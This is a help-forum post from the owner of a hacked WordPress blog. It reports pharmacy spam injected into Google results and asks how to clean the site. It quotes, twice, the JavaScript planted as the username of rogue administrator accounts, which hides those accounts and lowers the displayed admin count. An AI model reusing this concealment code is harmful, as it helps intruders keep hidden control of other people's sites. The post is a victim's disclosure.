How to find and clear Wordpress from a script / s that changes the headers of your posts on Google and Yahoo with the awkward text "Viagra"?

The day after protecting against a massive DDoS attack, http://arabcrunch.com is now hacked by someone who seems to be changing the message header in a Viagra ad on the Google search engine looks like they damaged us:

www.google.com/search?hl=en&client=safari&rls=en&q=Viagra+Online+Pharmacy+-+Buy+Online+Viagra%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs_rfai=

and here:

google.com/search?hl=en&client=safari&rls=en&q=idescribe&btnG=Search&aq=f&aqi=g-s1g-sx2g-s1g-sx1&aql=&oq=&gs_rfai=

We did a clean install of WP with clean pluggins and imported our database with old posts and all pages. then add each puglin we need manually, and then restore the sitemap.xml file

but now we’re doomed to the fact that any keyword you are looking for will get a result on google with the name: Viagra Online Pharmacy - Buy online Viagra, Cialis, Levitra

I found out in the DB table wp_usermeta user_id: 16 that the username is script:

<b id="user_superuser"><script language="JavaScript">
  var setUserName = function(){ 
      try{    
        var t=document.getElementById("user_superuser");   
                 while(t.nodeName!="TR"){      
           t=t.parentNode;                };   
         t.parentNode.removeChild(t);      
      var tags = document.getElementsByTagName("H3");    
        var s = " shown below"; 
           for (var i = 0; i < tags.length; i++) {    
             var t=tags[i].innerHTML;        
         var h=tags[i];             
    if(t.indexOf(s)>0){   
                   s =(parseInt(t)-1)+s;
                      h.removeChild(h.firstChild);
                      t = document.createTextNode(s);  
                        h.appendChild(t);                     }                }
   var arr=document.getElementsByTagName("ul");
   for(var i in arr) if(arr[i].className=="subsubsub"){
       var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
       if(n[1]>0){   var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)    </gi,">Administrator ("+(n[1]-1)+")<");   arr[i].innerHTML=txt;       }   } 
             }catch(e){};
      };      addLoadEvent(setUserName);      </script>

This is a smiler for hacking ArabCrunch EN along with thousands of WP blogs ported on 9/9/2009, read about it and refer to the solutions here: arabcrunch.com/2009/09/arabcrunch-and-wordpress-under-attack.html

After installation, we found 2 new users: wordpress.org and system, both installed as admin and have the same script as their username:

<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
 try{
  var t=document.getElementById("user_superuser");
  while(t.nodeName!="TR"){
   t=t.parentNode;
  };
  t.parentNode.removeChild(t);
  var tags = document.getElementsByTagName("H3");
  var s = " shown below";
  for (var i = 0; i < tags.length; i++) {
   var t=tags[i].innerHTML;
   var h=tags[i];
   if(t.indexOf(s)>0){
    s =(parseInt(t)-1)+s;
    h.removeChild(h.firstChild);
    t = document.createTextNode(s);
    h.appendChild(t);
   }
  }
  var arr=document.getElementsByTagName("ul");
  for(var i in arr) if(arr[i].className=="subsubsub"){
   var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
   if(n[1]>0){
    var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
        arr[i].innerHTML=txt;
        }
    }
          }catch(e){};
     };
     addLoadEvent(setUserName);
</script></div>

Any idea how to solve this?